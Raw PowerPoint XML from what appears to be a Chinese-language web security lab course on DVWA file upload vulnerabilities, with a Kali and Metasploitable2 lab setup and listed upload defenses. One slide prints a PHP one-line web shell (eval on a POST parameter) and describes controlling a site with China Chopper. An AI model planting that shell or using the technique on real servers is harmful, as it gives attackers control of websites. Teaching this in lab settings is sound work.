<file path=ppt/slides/_rels/slide24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321.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1320.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1319.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1318.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1317.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1316.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22.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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325.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1324.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1323.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1322.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1329.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1328.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1327.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1326.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1339.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1338.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1337.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1336.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1335.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1334.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1333.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1332.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1331.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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44.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1343.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1342.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1341.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1340.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1345.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image" Target="../media/image23.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag113.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image" Target="../media/image24.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag117.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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.pn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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.pn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29.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag146.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image" Target="../media/image30.png"/><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image" Target="../media/image31.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag156.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65.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag164.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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image" Target="../media/image33.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag166.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74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.pn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80.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag179.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag181.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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86.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><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37.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag187.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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><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image" Target="../media/image39.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag196.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image" Target="../media/image40.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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47.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag213.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag235.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.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79.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag274.xml"/></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90.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag289.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag285.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image" Target="../media/image47.png"/><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301.xml"/><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65.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xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><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68.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69.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70.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tags" Target="../tags/tag330.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag329.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag331.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag325.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide71.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s>
</file>

<file path=ppt/slides/_rels/slide72.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tags" Target="../tags/tag341.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><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xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag347.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide74.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xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag353.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><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75.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1.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image" Target="../media/image56.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide76.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77.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81.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83.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84.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85.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86.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1.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image" Target="../media/image65.png"/><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87.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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag419.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><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88.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s>
</file>

<file path=ppt/slides/_rels/slide89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide34.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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image" Target="../media/image67.png"/><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90.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9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tags" Target="../tags/tag436.xml"/></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93.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag446.xml"/></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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.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73e5f5811aab5673afcaa99032383457"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="screen"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="566420" y="1239520"/>
            <a:ext cx="4462145" cy="4491990"/>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nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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6"/>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框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751840" y="1828165"/>
            <a:ext cx="10800080" cy="267970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在靶机上有两个Web应用程序，它们是Mutillidae和DVWA，访问地址分别：</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L="457200" marR="0" lvl="1"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http://192.168.66.136/mutillidae/</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L="457200" marR="0" lvl="1"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http://192.168.66.136/dvwa/</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2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="855980" y="2304000"/>
          <a:ext cx="10558145" cy="995680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1000125"/>
                <a:gridCol w="3966210"/>
                <a:gridCol w="2205355"/>
                <a:gridCol w="3386455"/>
              </a:tblGrid>
              <a:tr h="367665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>编号</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操作系统</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用途</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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Kali Linux 2020.2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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>192.168.66.128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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>攻击机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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>Metasploitable2-Linux</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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>靶机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2351405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PHP一句话木马</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PHP一句话木马：&lt;?php @eval($_POST['pass']);?&gt;。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用文件上传漏洞，往目标网站上传一句话木马，然后通过中国菜刀chopper.exe即可获取和控制整个网站目录。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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4135120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、文件上传漏洞的防范措施</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对服务器端上传文件的目录设置为不可执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行多条件组合检查：文件大小，路径，扩展名，文件类型，完整性。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对上传的文件在服务器上存储时进行重命名（使用随机数改写文件名）。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1681480"/>
            <a:ext cx="10800080" cy="2520315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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a typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我们将在客户机上创建一个简单的脚本，然后利用DVWA平台将该脚本上传到服务器。上传脚本后，我们将在客户机上配置“中国菜刀”（一种常用的Web管理工具），利用它对服务器进行文件管理操作。本节的学习任务分为两部分：</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">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a typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、low级别的文件上传漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">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a typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、分析medium、high和impossible级别的文件上传源代码。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751840" y="1828165"/>
            <a:ext cx="10800080" cy="191389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在Web服务服上安装了DVWA平台。访问地址：http://192.168.1.201/dvwa/。</a:t>
            </a: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表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="855980" y="2304000"/>
          <a:ext cx="10558145" cy="995680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1000125"/>
                <a:gridCol w="3966210"/>
                <a:gridCol w="2205355"/>
                <a:gridCol w="3386455"/>
              </a:tblGrid>
              <a:tr h="367665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>编号</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操作系统</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用途</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Web服务器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498475" y="1325245"/>
            <a:ext cx="10972165" cy="202501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800" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在客户机上打开浏览器，访问http://192.168.1.201/dvwa/。输入用户名和密码进行登录。登录后，检查DVWA的“Security”模块，查看当前的安全级别是否为“low”。如果当前级别不是“low”，将其更改为“low”。然后，</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File Upload</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模块，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>也就是</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文件上传漏洞模块。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
